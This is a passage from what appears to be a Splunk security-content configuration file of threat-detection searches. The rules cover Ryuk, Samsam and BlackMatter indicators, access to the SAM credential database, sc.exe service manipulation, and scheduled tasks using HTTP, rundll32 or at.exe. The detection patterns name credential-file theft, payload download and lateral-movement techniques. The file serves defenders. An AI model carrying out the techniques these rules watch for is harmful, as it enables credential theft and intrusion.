process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited to no known false positives. action.escu.creation_date = 2021-03-01 action.escu.modification_date = 2021-03-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Ryuk Wake on LAN Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ryuk Ransomware"] action.risk = 1 action.risk.param._risk_message = A process $process_name$ with wake on LAN commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Ryuk Wake on LAN Command - Rule action.correlationsearch.annotations = {"analytic_story": ["Ryuk Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This Splunk query identifies the use of Wake-on-LAN utilized by Ryuk ransomware. The Ryuk Ransomware uses the Wake-on-Lan feature to turn on powered off devices on a compromised network to have greater success encrypting them. This is a high fidelity indicator of Ryuk ransomware executing on an endpoint. Upon triage, isolate the endpoint. Additional file modification events will be within the users profile (\appdata\roaming) and in public directories (users\public\). Review all Scheduled Tasks on the isolated endpoint and across the fleet. Suspicious Scheduled Tasks will include a path to a unknown binary and those endpoints should be isolated until triaged. action.notable.param.rule_title = Ryuk Wake on LAN Command action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="*8 LAN*" OR Processes.process="*9 REP*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `ryuk_wake_on_lan_command_filter` [ESCU - SAM Database File Access Attempt - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies access to SAM, SYSTEM or SECURITY databases' within the file path of `windows\system32\config` using Windows Security EventCode 4663. This particular behavior is related to credential access, an attempt to either use a Shadow Copy or recent CVE-2021-36934 to access the SAM database. The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista, Windows 7, 8.1 and 10 that stores users' passwords. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies access to SAM, SYSTEM or SECURITY databases' within the file path of `windows\system32\config` using Windows Security EventCode 4663. This particular behavior is related to credential access, an attempt to either use a Shadow Copy or recent CVE-2021-36934 to access the SAM database. The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista, Windows 7, 8.1 and 10 that stores users' passwords. action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy. Then check the two boxes listed for both "Success" and "Failure." action.escu.known_false_positives = Natively, `dllhost.exe` will access the files. Every environment will have additional native processes that do as well. Filter by process_name. As an aside, one can remove process_name entirely and add `Object_Name=*ShadowCopy*`. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - SAM Database File Access Attempt - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Credential Dumping", "Graceful Wipe Out Attack", "Rhysida Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - SAM Database File Access Attempt - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Graceful Wipe Out Attack", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-36934"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` (EventCode=4663) process_name!=*\\dllhost.exe Object_Name IN ("*\\Windows\\System32\\config\\SAM*","*\\Windows\\System32\\config\\SYSTEM*","*\\Windows\\System32\\config\\SECURITY*") | stats values(Accesses) count by process_name Object_Name dest user | `sam_database_file_access_attempt_filter` [ESCU - Samsam Test File Write - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for a file named "test.txt" written to the windows system directory tree, which is consistent with Samsam propagation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for a file named "test.txt" written to the windows system directory tree, which is consistent with Samsam propagation. action.escu.how_to_implement = You must be ingesting data that records the file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data. action.escu.known_false_positives = No false positives have been identified. action.escu.creation_date = 2018-12-14 action.escu.modification_date = 2018-12-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Samsam Test File Write - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware"] action.risk = 1 action.risk.param._risk_message = A samsam ransomware test file creation in $file_path$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Samsam Test File Write - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware"], "cis20": ["CIS 10"], "confidence": 20, "impact": 60, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for a file named "test.txt" written to the windows system directory tree, which is consistent with Samsam propagation. action.notable.param.rule_title = Samsam Test File Write action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_name) as file_name from datamodel=Endpoint.Filesystem where Filesystem.file_path=*\\windows\\system32\\test.txt by Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `samsam_test_file_write_filter` [ESCU - Sc exe Manipulating Windows Services - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for arguments to sc.exe indicating the creation or modification of a Windows service. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.003", "T1543"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for arguments to sc.exe indicating the creation or modification of a Windows service. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Using sc.exe to manipulate Windows services is uncommon. However, there may be legitimate instances of this behavior. It is important to validate and investigate as appropriate. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Sc exe Manipulating Windows Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Service Abuse", "DHS Report TA18-074A", "Orangeworm Attack Group", "Windows Persistence Techniques", "Disabling Security Tools", "NOBELIUM Group", "Azorult", "Windows Drivers"] action.risk = 1 action.risk.param._risk_message = A sc process $process_name$ with commandline $process$ to create of configure services in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Sc exe Manipulating Windows Services - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Service Abuse", "DHS Report TA18-074A", "Orangeworm Attack Group", "Windows Persistence Techniques", "Disabling Security Tools", "NOBELIUM Group", "Azorult", "Windows Drivers"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.003", "T1543"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for arguments to sc.exe indicating the creation or modification of a Windows service. action.notable.param.rule_title = Sc exe Manipulating Windows Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = sc.exe (Processes.process="* create *" OR Processes.process="* config *") by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `sc_exe_manipulating_windows_services_filter` [ESCU - SchCache Change By App Connect And Create ADSI Object - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect an application try to connect and create ADSI Object to do LDAP query. Every time an application connects to the directory and attempts to create an ADSI object, the Active Directory Schema is checked for changes. If it has changed since the last connection, the schema is downloaded and stored in a cache on the local computer either in %LOCALAPPDATA%\Microsoft\Windows\SchCache or %systemroot%\SchCache. We found this a good anomaly use case to detect suspicious application like blackmatter ransomware that use ADS object api to execute ldap query. having a good list of ldap or normal AD query tool used within the network is a good start to reduce the noise. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is to detect an application try to connect and create ADSI Object to do LDAP query. Every time an application connects to the directory and attempts to create an ADSI object, the Active Directory Schema is checked for changes. If it has changed since the last connection, the schema is downloaded and stored in a cache on the local computer either in %LOCALAPPDATA%\Microsoft\Windows\SchCache or %systemroot%\SchCache. We found this a good anomaly use case to detect suspicious application like blackmatter ransomware that use ADS object api to execute ldap query. having a good list of ldap or normal AD query tool used within the network is a good start to reduce the noise. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = normal application like mmc.exe and other ldap query tool may trigger this detections. action.escu.creation_date = 2021-09-07 action.escu.modification_date = 2021-09-07 action.escu.confidence = high action.escu.full_search_name = ESCU - SchCache Change By App Connect And Create ADSI Object - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["BlackMatter Ransomware"] action.risk = 1 action.risk.param._risk_message = process $Image$ create a file $TargetFilename$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - SchCache Change By App Connect And Create ADSI Object - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackMatter Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=11 TargetFilename = "*\\Windows\\SchCache\\*" TargetFilename = "*.sch*" NOT (Image IN ("*\\Windows\\system32\\mmc.exe")) |stats count min(_time) as firstTime max(_time) as lastTime by Image TargetFilename EventCode process_id process_name dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `schcache_change_by_app_connect_and_create_adsi_object_filter` [ESCU - Schedule Task with HTTP Command Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the registration of suspicious tasks on Windows using the Windows Security EventCode 4698, "A scheduled task was created." It specifically looks for tasks registered through schtasks.exe or TaskService that have command arguments containing the string "HTTP." This behavior is often associated with malware or attacks that utilize Living off the Land binaries (lolbins) to download additional files or payloads to the compromised machine.\ The search returns information about the task, such as the task name, command, author, enabled status, hidden status, and arguments. Upon triage, it is important to identify the source of the scheduled task, whether it was registered through schtasks.exe or TaskService. Review the details of the created task and the command to be executed. Capture relevant artifacts on disk and examine them. Additionally, identify any parallel processes occurring within the same timeframe to determine the source of the attack.\ Implementing this analytic requires ingesting logs with information about task schedules, specifically Windows Security Log EventCode 4698, from your endpoints. It is recommended to tune and filter known instances of task schedules used in your environment to minimize false positives.\ Detecting the registration of suspicious tasks with HTTP command arguments is valuable for a SOC as it indicates potential malicious activity or an attempt to establish persistence on the system. If a true positive is found, further investigation is warranted to analyze the nature and purpose of the scheduled task, identify any downloaded files or payloads, and mitigate the associated risks. The impact of a true positive can vary but may include data exfiltration, malware propagation, or unauthorized access to sensitive information. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the registration of suspicious tasks on Windows using the Windows Security EventCode 4698, "A scheduled task was created." It specifically looks for tasks registered through schtasks.exe or TaskService that have command arguments containing the string "HTTP." This behavior is often associated with malware or attacks that utilize Living off the Land binaries (lolbins) to download additional files or payloads to the compromised machine.\ The search returns information about the task, such as the task name, command, author, enabled status, hidden status, and arguments. Upon triage, it is important to identify the source of the scheduled task, whether it was registered through schtasks.exe or TaskService. Review the details of the created task and the command to be executed. Capture relevant artifacts on disk and examine them. Additionally, identify any parallel processes occurring within the same timeframe to determine the source of the attack.\ Implementing this analytic requires ingesting logs with information about task schedules, specifically Windows Security Log EventCode 4698, from your endpoints. It is recommended to tune and filter known instances of task schedules used in your environment to minimize false positives.\ Detecting the registration of suspicious tasks with HTTP command arguments is valuable for a SOC as it indicates potential malicious activity or an attempt to establish persistence on the system. If a true positive is found, further investigation is warranted to analyze the nature and purpose of the scheduled task, identify any downloaded files or payloads, and mitigate the associated risks. The impact of a true positive can vary but may include data exfiltration, malware propagation, or unauthorized access to sensitive information. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the task schedule (Exa. Security Log EventCode 4698) endpoints. Tune and filter known instances of Task schedule used in your environment. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-05 action.escu.modification_date = 2023-04-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Schedule Task with HTTP Command Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Living Off The Land", "Winter Vivern", "Windows Persistence Techniques", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A schedule task process commandline arguments $Arguments$ with http string on it in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Schedule Task with HTTP Command Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land", "Winter Vivern", "Windows Persistence Techniques", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the registration of suspicious tasks on Windows using the Windows Security EventCode 4698, "A scheduled task was created." It specifically looks for tasks registered through schtasks.exe or TaskService that have command arguments containing the string "HTTP." This behavior is often associated with malware or attacks that utilize Living off the Land binaries (lolbins) to download additional files or payloads to the compromised machine.\ The search returns information about the task, such as the task name, command, author, enabled status, hidden status, and arguments. Upon triage, it is important to identify the source of the scheduled task, whether it was registered through schtasks.exe or TaskService. Review the details of the created task and the command to be executed. Capture relevant artifacts on disk and examine them. Additionally, identify any parallel processes occurring within the same timeframe to determine the source of the attack.\ Implementing this analytic requires ingesting logs with information about task schedules, specifically Windows Security Log EventCode 4698, from your endpoints. It is recommended to tune and filter known instances of task schedules used in your environment to minimize false positives.\ Detecting the registration of suspicious tasks with HTTP command arguments is valuable for a SOC as it indicates potential malicious activity or an attempt to establish persistence on the system. If a true positive is found, further investigation is warranted to analyze the nature and purpose of the scheduled task, identify any downloaded files or payloads, and mitigate the associated risks. The impact of a true positive can vary but may include data exfiltration, malware propagation, or unauthorized access to sensitive information. action.notable.param.rule_title = Schedule Task with HTTP Command Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4698 | xmlkv Message| search Arguments IN ("*http*") | stats count min(_time) as firstTime max(_time) as lastTime by dest, Task_Name, Command, Author, Enabled, Hidden, Arguments | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `schedule_task_with_http_command_arguments_filter` [ESCU - Schedule Task with Rundll32 Command Trigger - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of suspicious tasks in Windows, specifically tasks using the rundll32 command. It's implemented using Windows Security EventCode 4698 for A scheduled task was created, and looks for tasks executed either via schtasks.exe or TaskService. This behavior is worth identifying as it is commonly used by malware, such as TrickBot, that leverages rundll32 to execute its downloader.\ If a true positive is found, it suggests an attacker is trying to persist within the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes.\ To implement this analytic, ensure you are ingesting logs with task schedule information from your endpoints. Be aware of potential false positives - legitimate uses of Task Scheduler in your environment may cause benign activities to be flagged.\ Upon triage, review the scheduled task's source and the command to be executed. Capture and inspect any relevant on-disk artifacts, and look for concurrent processes to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of suspicious tasks in Windows, specifically tasks using the rundll32 command. It's implemented using Windows Security EventCode 4698 for A scheduled task was created, and looks for tasks executed either via schtasks.exe or TaskService. This behavior is worth identifying as it is commonly used by malware, such as TrickBot, that leverages rundll32 to execute its downloader.\ If a true positive is found, it suggests an attacker is trying to persist within the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes.\ To implement this analytic, ensure you are ingesting logs with task schedule information from your endpoints. Be aware of potential false positives - legitimate uses of Task Scheduler in your environment may cause benign activities to be flagged.\ Upon triage, review the scheduled task's source and the command to be executed. Capture and inspect any relevant on-disk artifacts, and look for concurrent processes to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the task schedule (Exa. Security Log EventCode 4698) endpoints. Tune and filter known instances of Task schedule used in your environment. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-04-19 action.escu.modification_date = 2021-04-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Schedule Task with Rundll32 Command Trigger - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Windows Persistence Techniques", "Trickbot", "IcedID", "Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A schedule task process commandline rundll32 arguments $Arguments$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Schedule Task with Rundll32 Command Trigger - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Persistence Techniques", "Trickbot", "IcedID", "Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation of suspicious tasks in Windows, specifically tasks using the rundll32 command. It's implemented using Windows Security EventCode 4698 for A scheduled task was created, and looks for tasks executed either via schtasks.exe or TaskService. This behavior is worth identifying as it is commonly used by malware, such as TrickBot, that leverages rundll32 to execute its downloader.\ If a true positive is found, it suggests an attacker is trying to persist within the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes.\ To implement this analytic, ensure you are ingesting logs with task schedule information from your endpoints. Be aware of potential false positives - legitimate uses of Task Scheduler in your environment may cause benign activities to be flagged.\ Upon triage, review the scheduled task's source and the command to be executed. Capture and inspect any relevant on-disk artifacts, and look for concurrent processes to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks. action.notable.param.rule_title = Schedule Task with Rundll32 Command Trigger action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4698 | xmlkv Message | search Command IN ("*rundll32*") | stats count min(_time) as firstTime max(_time) as lastTime by dest, Task_Name, Command, Author, Enabled, Hidden, Arguments | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `schedule_task_with_rundll32_command_trigger_filter` [ESCU - Scheduled Task Creation on Remote Endpoint using At - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of suspicious tasks on a remote Windows endpoint using the at.exe command with command-line arguments. This technique is commonly used by red teams and adversaries for lateral movement and remote code execution. The at.exe binary leverages the deprecated AT protocol, which may still work on previous versions of Windows. Attackers can enable this protocol on demand by modifying a system registry key. It is important to consider potential false positives. While administrators may create scheduled tasks on remote systems, this activity is typically limited to a small set of hosts or users.\ Identifying the creation of scheduled tasks on remote endpoints is crucial for a Security Operations Center (SOC) because it indicates potential unauthorized activity or an attacker attempting to establish persistence or execute malicious code. The impact of a true positive can be significant, leading to unauthorized access, data theft, or other damaging outcomes. During triage, investigate the source and purpose of the scheduled task, inspect relevant on-disk artifacts, and analyze concurrent processes to identify the extent of the attack and take appropriate response actions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the creation of suspicious tasks on a remote Windows endpoint using the at.exe command with command-line arguments. This technique is commonly used by red teams and adversaries for lateral movement and remote code execution. The at.exe binary leverages the deprecated AT protocol, which may still work on previous versions of Windows. Attackers can enable this protocol on demand by modifying a system registry key. It is important to consider potential false positives. While administrators may create scheduled tasks on remote systems, this activity is typically limited to a small set of hosts or users.\ Identifying the creation of scheduled tasks on remote endpoints is crucial for a Security Operations Center (SOC) because it indicates potential unauthorized activity or an attacker attempting to establish persistence or execute malicious code. The impact of a true positive can be significant, leading to unauthorized access, data theft, or other damaging outcomes. During triage, investigate the source and purpose of the scheduled task, inspect relevant on-disk artifacts, and analyze concurrent processes to identify the extent of the attack and take appropriate response actions. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may create scheduled tasks on remote systems, but this activity is usually limited to a small set of hosts or users. action.escu.creation_date = 2021-11-11 action.escu.modification_date = 2021-11-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Scheduled Task Creation on Remote Endpoint using At - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A Windows Scheduled Task was created on a remote endpoint from $dest action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Scheduled Task Creation on Remote Endpoint using At - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation of suspicious tasks on a remote Windows endpoint using the at.exe command with command-line arguments. This technique is commonly used by red teams and adversaries for lateral movement and remote code execution. The at.exe binary leverages the deprecated AT protocol, which may still work on previous versions of Windows. Attackers can enable this protocol on demand by modifying a system registry key. It is important to consider potential false positives. While administrators may create scheduled tasks on remote systems, this activity is typically limited to a small set of hosts or users.\ Identifying the creation of scheduled tasks on remote endpoints is crucial for a Security Operations Center (SOC) because it indicates potential unauthorized activity or an attacker attempting to establish persistence or execute malicious code. The impact of a true positive can be significant, leading to unauthorized access, data theft, or other damaging outcomes. During triage, investigate the source and purpose of the scheduled task, inspect relevant on-disk artifacts, and analyze concurrent processes to identify the extent of the attack and take appropriate response actions. action.notable.param.rule_title = Scheduled Task Creation on Remote Endpoint using At action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=at.exe OR Processes.original_file_name=at.exe) (Processes.process=*\\\\*) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `scheduled_task_creation_on_remote_endpoint_using_at_filter` [ESCU - Scheduled Task Deleted Or Created via CMD - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic focuses on identifying the creation or deletion of scheduled tasks using the schtasks.exe utility with the corresponding command-line flags (-create or -delete). This technique has been notably associated with threat actors like Dragonfly and the SUNBURST attack against SolarWinds. The purpose of this analytic is to detect suspicious activity related to scheduled tasks that could indicate malicious intent or unauthorized system manipulation. By monitoring for these specific command-line flags, we can enhance our ability to identify potential threats and prevent attacks similar to the use of scheduled tasks in the BadRabbit 